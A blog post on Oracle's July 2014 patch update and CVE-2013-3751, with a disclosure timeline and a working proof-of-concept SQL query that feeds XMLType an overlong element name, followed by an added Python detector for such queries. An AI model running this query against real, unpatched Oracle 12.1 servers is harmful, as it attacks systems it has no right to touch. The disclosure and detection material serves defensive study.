Yesterday, Oracle released its July 2014 Critical Patch Update (CPU Jul 2014). This CPU contains fixes for 5 database vulnerabilities. The most critical one, CVE-2013-3751, has a base score of 9.0 and affects Oracle 12.1 only. The same issue was already fixed for Oracle 11.2 in July 2013 (CPU Jul 2013).
After a short search on the web (Google and Twitter, less than 5 minutes) I found an exploit for CVE-2013-3751.
This vulnerability was found by Nicolas Grégoire, who released an exploit nearly 1 year after the patch was published by Oracle. But it seems that he was not aware that Oracle forgot to fix this issue in Oracle 12.1.
Timeline of CVE-2013-3751:
- January 2012: Vulnerability found (fuzzing)
- February 2012: Vulnerability reported to ZDI
- March 2012: Vulnerability contracted $500
- November 2012: Reported to Oracle by ZDI
- July 2013: Patch published by Oracle
- March 2014: Oracle’s Cloud still not patched
- June 2014: Exploit released at INS#14 conference
- July 2014: Patch for Oracle 12.1 published by Oracle
Exploit:
———-
select * from dual where xmltype(q'{<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
abbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbcccccccccccccccccccccccccccccccccccccccccccccccc
ddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
ffffffffffffffffffffffffffffffffffffffffffffffffhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
iiiiiiiiiiiiiiiiiiiiiiiiii foo="bar[a < b]"/>}') like '0wn3d_again';
———-
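What distinguishes the PoC above is an XMLType literal whose element name runs to hundreds of characters. As an added example (not part of the original post), the following Python heuristic flags statements of that shape in captured SQL text, for instance from audit trail output, so a DBA can spot attempts on unpatched 12.1 instances; the sample statements, the 64-character threshold and the function names are constructed assumptions.

```python
import re

# Constructed sample statements (not from the post): a benign XMLType call,
# one shaped like the PoC above (element name of 260 characters), and a
# statement without XMLType at all.
SAMPLE_STATEMENTS = [
    "select * from dual where xmltype('<a foo=\"bar\"/>') is not null",
    "select * from dual where xmltype(q'{<" + "a" * 260
    + " foo=\"bar[a < b]\"/>}') like '0wn3d_again'",
    "select count(*) from employees",
]

# Matches xmltype('...') and the q'{...}' quoting used by the PoC.
XMLTYPE_LITERAL = re.compile(
    r"xmltype\s*\(\s*(?:q'\{(?P<q>.*?)\}'|'(?P<s>[^']*)')",
    re.IGNORECASE | re.DOTALL,
)
# Opening tag name: '<', optional whitespace, then a name-like token.
ELEMENT_NAME = re.compile(r"<\s*([A-Za-z_][^\s/>]*)")


def longest_element_name(statement):
    """Return the longest element name found inside any XMLType literal
    of the statement (empty string if there is none)."""
    longest = ""
    for m in XMLTYPE_LITERAL.finditer(statement):
        xml = m.group("q") if m.group("q") is not None else m.group("s")
        for name in ELEMENT_NAME.findall(xml):
            if len(name) > len(longest):
                longest = name
    return longest


def flag_statements(statements, max_name_len=64):
    """Return (index, name_length) for each statement whose XMLType
    literal carries an element name longer than max_name_len.
    The 64-character threshold is an assumed tuning value."""
    flagged = []
    for i, stmt in enumerate(statements):
        name_len = len(longest_element_name(stmt))
        if name_len > max_name_len:
            flagged.append((i, name_len))
    return flagged


if __name__ == "__main__":
    for idx, name_len in flag_statements(SAMPLE_STATEMENTS):
        print(f"statement {idx}: element name of {name_len} chars")
```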